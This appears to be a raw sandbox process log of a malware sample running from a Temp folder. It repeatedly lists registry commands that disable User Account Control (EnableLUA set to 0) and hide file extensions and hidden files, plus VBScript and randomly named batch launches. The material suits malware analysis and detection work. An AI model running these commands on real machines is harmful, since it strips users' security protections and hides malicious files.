C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nwgUIEMA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YgQkQIIo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eCEIYMYY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sacAQoEE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\euwcscwU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TCUcIYkc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LkkMQAYc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dqYAMUoc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gSQEQIkg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mSQQYMEI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YycUMgQQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OyYokYsE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\feowIEss.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LKsYMIIE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FmEkgcoc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sIMgkEEg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eigEEYQs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ouAkIgcs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pggAUMcU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

